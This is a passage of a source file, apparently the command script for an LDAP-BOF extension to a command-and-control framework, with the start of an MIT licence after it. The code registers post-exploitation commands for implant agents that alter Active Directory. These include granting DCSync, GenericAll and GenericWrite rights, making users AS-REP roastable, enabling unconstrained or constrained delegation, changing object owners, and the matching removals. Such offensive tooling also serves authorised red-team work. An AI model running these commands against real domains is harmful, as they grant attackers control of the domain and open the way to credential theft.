    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int",
        [target, is_target_dn, owner, is_owner_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/set-owner." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Setting owner of ${target} to ${owner}...`);
});



// ============================================================================
// MOVE COMMANDS
// ============================================================================

var _cmd_moveobject = ax.create_command(
    "move-object",
    "Move an object to a different OU",
    "ldap move-object jane.doe \"OU=Managers,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_moveobject.addArgString("object", true, "Object name or DN to move");
_cmd_moveobject.addArgString("destination", true, "Destination OU DN");
_cmd_moveobject.addArgFlagString("-n", "newname", false, "New name for the object (optional)");
_cmd_moveobject.addArgFlagString("-ou", "ou_path", false, "OU path to search for object");
_cmd_moveobject.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_moveobject.addArgBool("--ldaps", "Use LDAPS (port 636)");

_cmd_moveobject.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let object = parsed_json["object"];
    let is_dn = identifyInputType(object);
    let destination = parsed_json["destination"];
    let newname = parsed_json["newname"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,cstr,int", [object, is_dn, destination, newname, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/move-object." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Moving ${object} to ${destination}...`);
});



// ============================================================================
// REMOVE COMMANDS
// ============================================================================

var _cmd_removegroupmember = ax.create_command(
    "remove-groupmember",
    "Remove a member from a group",
    "ldap remove-groupmember Stark jane.doe -dc dc01.domain.local"
);
_cmd_removegroupmember.addArgString("group", true, "Group name or DN");
_cmd_removegroupmember.addArgString("member", true, "Member name or DN");
_cmd_removegroupmember.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removegroupmember.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removegroupmember.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removegroupmember.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let group = parsed_json["group"];
    let is_group_dn = identifyInputType(group);
    let member = parsed_json["member"];
    let is_member_dn = identifyInputType(member);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int",
        [group, is_group_dn, member, is_member_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-groupmember." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing ${member} from ${group}...`);
});



var _cmd_removeobject = ax.create_command(
    "remove-object",
    "Remove an object from the domain",
    "ldap remove-object jane.doe -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_removeobject.addArgString("object", true, "Object name or DN");
_cmd_removeobject.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removeobject.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removeobject.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removeobject.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let object = parsed_json["object"];
    let is_dn = identifyInputType(object);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int", [object, is_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-object." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing ${object}...`);
});



var _cmd_removespn = ax.create_command(
    "remove-spn",
    "Remove an SPN from an object",
    "ldap remove-spn machine01$ HOST/machine01.domain.local -dc dc01.domain.local"
);
_cmd_removespn.addArgString("target", true, "Object name or DN");
_cmd_removespn.addArgString("spn", true, "SPN to remove");
_cmd_removespn.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removespn.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removespn.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removespn.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let spn = parsed_json["spn"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, spn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-spn." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing SPN ${spn} from ${target}...`);
});



var _cmd_removedelegation = ax.create_command(
    "remove-delegation",
    "Remove a delegation SPN",
    "ldap remove-delegation machine01$ RestrictedKrbHost/machine01.domain.local -dc dc01.domain.local"
);
_cmd_removedelegation.addArgString("target", true, "Object name or DN");
_cmd_removedelegation.addArgString("spn", true, "Delegation SPN to remove");
_cmd_removedelegation.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removedelegation.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removedelegation.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removedelegation.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let spn = parsed_json["spn"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, spn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-delegation." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing delegation SPN from ${target}...`);
});



var _cmd_removeattribute = ax.create_command(
    "remove-attribute",
    "Remove an attribute or attribute value",
    "ldap remove-attribute jane.doe description -value 'File not found' -dc dc01.domain.local"
);
_cmd_removeattribute.addArgString("target", true, "Object name or DN");
_cmd_removeattribute.addArgString("attribute", true, "Attribute name");
_cmd_removeattribute.addArgFlagString("-value", "value", false, "Specific value to remove (removes entire attribute if not specified)");
_cmd_removeattribute.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removeattribute.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removeattribute.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removeattribute.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let attribute = parsed_json["attribute"];
    let value = parsed_json["value"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,cstr,int",
        [target, is_dn, attribute, value, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-attribute." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing ${attribute} from ${target}...`);
});



var _cmd_removeuac = ax.create_command(
    "remove-uac",
    "Remove UAC flags from an object",
    "ldap remove-uac jane.doe DONT_EXPIRE_PASSWD -dc dc01.domain.local"
);
_cmd_removeuac.addArgString("target", true, "Object name or DN");
_cmd_removeuac.addArgString("flags", true, "Comma-separated UAC flags to remove");
_cmd_removeuac.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removeuac.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removeuac.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removeuac.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let flags = parsed_json["flags"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, flags, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-uac." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing UAC flags from ${target}...`);
});



var _cmd_removeace = ax.create_command(
    "remove-ace",
    "Remove an ACE from an object's DACL",
    "ldap remove-ace cn=SomeObject,OU=Data,DC=domain,DC=local -trustee jane.doe -dc dc01.domain.local"
);
_cmd_removeace.addArgString("target", true, "Target object name or DN");
_cmd_removeace.addArgFlagString("-trustee", "trustee", false, "Trustee name or DN to match (use instead of index)");
_cmd_removeace.addArgFlagString("-rights", "rights", false, "Access rights to match (optional, e.g., GenericAll, DCSync)");
_cmd_removeace.addArgFlagString("-type","ace_type", false, "ACE type to match (optional: allow, deny)");
_cmd_removeace.addArgFlagInt("-index","ace_index", false, "ACE index to remove (use get-acl to find index)");
_cmd_removeace.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removeace.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removeace.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removeace.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){

    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"] || "";
    let is_trustee_dn = identifyInputType(trustee);
    let rights = parsed_json["rights"] || "";
    let ace_type = parsed_json["ace_type"] || "";
    let ace_index = parsed_json["ace_index"] || -1;
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int,cstr,cstr,int",
        [target, is_dn, trustee, is_trustee_dn, rights, ace_type, ace_index, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing ACE from ${target}...`);
});



var _cmd_removerbcd = ax.create_command(
    "remove-rbcd",
    "Remove an RBCD delegation",
    "ldap remove-rbcd targetComputer principalAccount -dc dc01.domain.local"
);
_cmd_removerbcd.addArgString("target", true, "Target object name or DN");
_cmd_removerbcd.addArgString("delegate", true, "Object to remove from delegation");
_cmd_removerbcd.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removerbcd.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removerbcd.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removerbcd.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let delegate = parsed_json["delegate"];
    let is_delegate_dn = identifyInputType(delegate);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int",
        [target, is_target_dn, delegate, is_delegate_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-rbcd." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing RBCD delegation from ${target}...`);
});



// ============================================================================
// MACRO COMMANDS (using existing BOFs with preset parameters)
// ============================================================================

var _cmd_addgenericall = ax.create_command(
    "add-genericall",
    "Add a GenericAll ACE to an object's DACL",
    "ldap add-genericall cn=SomeObject,OU=Data,DC=domain,DC=local jane.doe -dc dc01.domain.local"
);
_cmd_addgenericall.addArgString("target", true, "Target object name or DN");
_cmd_addgenericall.addArgString("trustee", true, "Trustee name or DN");
_cmd_addgenericall.addArgFlagString("-type", "ace_type", false, "ACE type: allow (default), deny");
_cmd_addgenericall.addArgFlagString("-flags", "flags", false, "ACE inheritance flags (e.g., CI,OI)");
_cmd_addgenericall.addArgFlagString("-guid", "guid", false, "Object type GUID");
_cmd_addgenericall.addArgFlagString("-inherit-guid", "inherit_guid", false, "Inherited object type GUID");
_cmd_addgenericall.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addgenericall.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addgenericall.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addgenericall.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"];
    let is_trustee_dn = identifyInputType(trustee);
    let rights = "GenericAll";
    let ace_type = parsed_json["ace_type"] || "";
    let flags = parsed_json["flags"] || "";
    let guid = parsed_json["guid"] || "";
    let inherit_guid = parsed_json["inherit_guid"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,cstr,cstr,cstr,cstr,cstr,int",
        [target, is_target_dn, trustee, is_trustee_dn, rights, ace_type, flags, guid, inherit_guid, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding ACE to ${target}...`);
});



var _cmd_addgenericwrite = ax.create_command(
    "add-genericwrite",
    "Add a GenericWrite ACE to an object's DACL",
    "ldap add-genericwrite cn=SomeObject,OU=Data,DC=domain,DC=local jane.doe -dc dc01.domain.local"
);
_cmd_addgenericwrite.addArgString("target", true, "Target object name or DN");
_cmd_addgenericwrite.addArgString("trustee", true, "Trustee name or DN");
_cmd_addgenericwrite.addArgFlagString("-type", "ace_type", false, "ACE type: allow (default), deny");
_cmd_addgenericwrite.addArgFlagString("-flags", "flags", false, "ACE inheritance flags (e.g., CI,OI)");
_cmd_addgenericwrite.addArgFlagString("-guid", "guid", false, "Object type GUID");
_cmd_addgenericwrite.addArgFlagString("-inherit-guid", "inherit_guid", false, "Inherited object type GUID");
_cmd_addgenericwrite.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addgenericwrite.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addgenericwrite.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addgenericwrite.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"];
    let is_trustee_dn = identifyInputType(trustee);
    let rights = "GenericWrite";
    let ace_type = parsed_json["ace_type"] || "";
    let flags = parsed_json["flags"] || "";
    let guid = parsed_json["guid"] || "";
    let inherit_guid = parsed_json["inherit_guid"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,cstr,cstr,cstr,cstr,cstr,int",
        [target, is_target_dn, trustee, is_trustee_dn, rights, ace_type, flags, guid, inherit_guid, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding ACE to ${target}...`);
});



var _cmd_adddcsync = ax.create_command(
    "add-dcsync",
    "Add DCSync ACEs to an object's DACL",
    "ldap add-dcsync DC=domain,DC=local jane.doe -dc dc01.domain.local"
);
_cmd_adddcsync.addArgString("target", true, "Target object name or DN");
_cmd_adddcsync.addArgString("trustee", true, "Trustee name or DN");
_cmd_adddcsync.addArgFlagString("-type", "ace_type", false, "ACE type: allow (default), deny");
_cmd_adddcsync.addArgFlagString("-flags", "flags", false, "ACE inheritance flags (e.g., CI,OI)");
_cmd_adddcsync.addArgFlagString("-guid", "guid", false, "Object type GUID");
_cmd_adddcsync.addArgFlagString("-inherit-guid", "inherit_guid", false, "Inherited object type GUID");
_cmd_adddcsync.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_adddcsync.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_adddcsync.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_adddcsync.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"];
    let is_trustee_dn = identifyInputType(trustee);
    let rights = "DCSync";
    let ace_type = parsed_json["ace_type"] || "";
    let flags = parsed_json["flags"] || "";
    let guid = parsed_json["guid"] || "";
    let inherit_guid = parsed_json["inherit_guid"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,cstr,cstr,cstr,cstr,cstr,int",
        [target, is_target_dn, trustee, is_trustee_dn, rights, ace_type, flags, guid, inherit_guid, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding ACE to ${target}...`);
});



var _cmd_addasreproastable = ax.create_command(
    "add-asreproastable",
    "Make a user AS-REP roastable (set DONT_REQ_PREAUTH)",
    "ldap add-asreproastable jane.doe -dc dc01.domain.local"
);
_cmd_addasreproastable.addArgString("target", true, "Target user name or DN");
_cmd_addasreproastable.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addasreproastable.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addasreproastable.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addasreproastable.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, "DONT_REQ_PREAUTH", ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-uac." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Making ${target} AS-REP roastable...`);
});



var _cmd_addunconstrained = ax.create_command(
    "add-unconstrained",
    "Enable unconstrained delegation on an object",
    "ldap add-unconstrained machine01$ -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_addunconstrained.addArgString("target", true, "Target object name or DN");
_cmd_addunconstrained.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addunconstrained.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addunconstrained.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addunconstrained.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, "TRUSTED_FOR_DELEGATION", ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-uac." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Enabling unconstrained delegation on ${target}...`);
});

var _cmd_addconstrained = ax.create_command(
    "add-constrained",
    "Set/replace delegation SPNs",
    "ldap add-constrained machine01$ RestrictedKrbHost/machine01.domain.local -dc dc01.domain.local"
);
_cmd_addconstrained.addArgString("target", true, "Object name or DN");
_cmd_addconstrained.addArgString("spn", true, "Delegation SPN (replaces all existing)");
_cmd_addconstrained.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addconstrained.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addconstrained.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addconstrained.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let spn = parsed_json["spn"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, spn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-delegation." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Setting delegation on ${target}...`);
});



var _cmd_removedcsync = ax.create_command(
    "remove-dcsync",
    "Remove DCSync ACEs from an object's DACL",
    "ldap remove-dcsync DC=domain,DC=local jane.doe -dc dc01.domain.local"
);
_cmd_removedcsync.addArgString("target", true, "Target object name or DN");
_cmd_removedcsync.addArgString("trustee", true, "Trustee name or DN");
_cmd_removedcsync.addArgFlagString("-type","ace_type", false, "ACE type to match (optional: allow, deny)");
_cmd_removedcsync.addArgFlagInt("-index","ace_index", false, "ACE index to remove (use get-acl to find index)");
_cmd_removedcsync.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removedcsync.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removedcsync.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removedcsync.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"];
    let is_trustee_dn = identifyInputType(trustee);
    let rights = "DCSync";
    let ace_type = parsed_json["ace_type"] || "";
    let ace_index = parsed_json["ace_index"] || -1;
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int,cstr,cstr,int",
        [target, is_dn, trustee, is_trustee_dn, rights, ace_type, ace_index, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing DCSync from ${target}...`);
});



var _cmd_removegenericwrite = ax.create_command(
    "remove-genericwrite",
    "Remove a GenericWrite ACE from an object's DACL",
    "ldap remove-genericwrite cn=SomeObject,OU=Data,DC=domain,DC=local jane.doe -dc dc01.domain.local"
);
_cmd_removegenericwrite.addArgString("target", true, "Target object name or DN");
_cmd_removegenericwrite.addArgString("trustee", true, "Trustee name or DN");
_cmd_removegenericwrite.addArgFlagString("-type","ace_type", false, "ACE type to match (optional: allow, deny)");
_cmd_removegenericwrite.addArgFlagInt("-index","ace_index", false, "ACE index to remove (use get-acl to find index)");
_cmd_removegenericwrite.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removegenericwrite.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removegenericwrite.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removegenericwrite.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"] || "";
    let is_trustee_dn = identifyInputType(trustee);
    let rights = "GenericWrite";
    let ace_type = parsed_json["ace_type"] || "";
    let ace_index = parsed_json["ace_index"] || -1;
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int,cstr,cstr,int",
        [target, is_dn, trustee, is_trustee_dn, rights, ace_type, ace_index, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing GenericWrite from ${target}...`);
});



var _cmd_removegenericall= ax.create_command(
    "remove-genericall",
    "Remove a GenericAll ACE from an object's DACL",
    "ldap remove-genericall cn=SomeObject,OU=Data,DC=domain,DC=local jane.doe -dc dc01.domain.local"
);
_cmd_removegenericall.addArgString("target", true, "Target object name or DN");
_cmd_removegenericall.addArgString("trustee", true, "Trustee name or DN");
_cmd_removegenericall.addArgFlagString("-type","ace_type", false, "ACE type to match (optional: allow, deny)");
_cmd_removegenericall.addArgFlagInt("-index","ace_index", false, "ACE index to remove (use get-acl to find index)");
_cmd_removegenericall.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_removegenericall.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_removegenericall.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_removegenericall.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"] || "";
    let is_trustee_dn = identifyInputType(trustee);
    let rights = "GenericAll";
    let ace_type = parsed_json["ace_type"] || "";
    let ace_index = parsed_json["ace_index"] || -1;
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int,cstr,cstr,int",
        [target, is_dn, trustee, is_trustee_dn, rights, ace_type, ace_index, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/remove-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Removing GenericAll from ${target}...`);
});



var cmd_ldap = ax.create_command("ldap", "LDAP domain interactions (LDAP-BOF)");
cmd_ldap.addSubCommands([ _cmd_getacl, _cmd_getattribute, _cmd_getcomputers, _cmd_getgroups, _cmd_getgroupmembers, _cmd_getdelegation, _cmd_getdomaininfo, _cmd_getmaq,
                          _cmd_getobject, _cmd_getrbcd, _cmd_getspn, _cmd_getuac,  _cmd_getusers, _cmd_getusergroups, _cmd_getwritable ]);
cmd_ldap.addSubCommands([_cmd_moveobject]);
cmd_ldap.addSubCommands([_cmd_addace, _cmd_addattribute, _cmd_addcomputer, _cmd_adddelegation, _cmd_addgroup, _cmd_addgroupmember, _cmd_addou, _cmd_addrbcd,
                         _cmd_addsidhistory, _cmd_addspn, _cmd_adduser, _cmd_adduac ]);
cmd_ldap.addSubCommands([_cmd_addgenericall, _cmd_addgenericwrite, _cmd_adddcsync, _cmd_addasreproastable, _cmd_addunconstrained, _cmd_addconstrained, ]);
cmd_ldap.addSubCommands([_cmd_setattribute, _cmd_setdelegation, _cmd_setowner, _cmd_setspn, _cmd_setpassword, _cmd_setuac ]);
cmd_ldap.addSubCommands([_cmd_removeace, _cmd_removeattribute, _cmd_removedelegation, _cmd_removedcsync, _cmd_removegenericall, _cmd_removegenericwrite,
                         _cmd_removegroupmember, _cmd_removeobject, _cmd_removerbcd, _cmd_removespn, _cmd_removeuac, ]);


var group_ldap = ax.create_commands_group("LDAP-BOF", [cmd_ldap]);
ax.register_commands_group(group_ldap, ["beacon", "gopher", "kharon"], ["windows"], []);

================================================
FILE: AD-BOF/LDAP-BOF/LICENSE
================================================
MIT License

Copyright (c) 2025 Polar

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
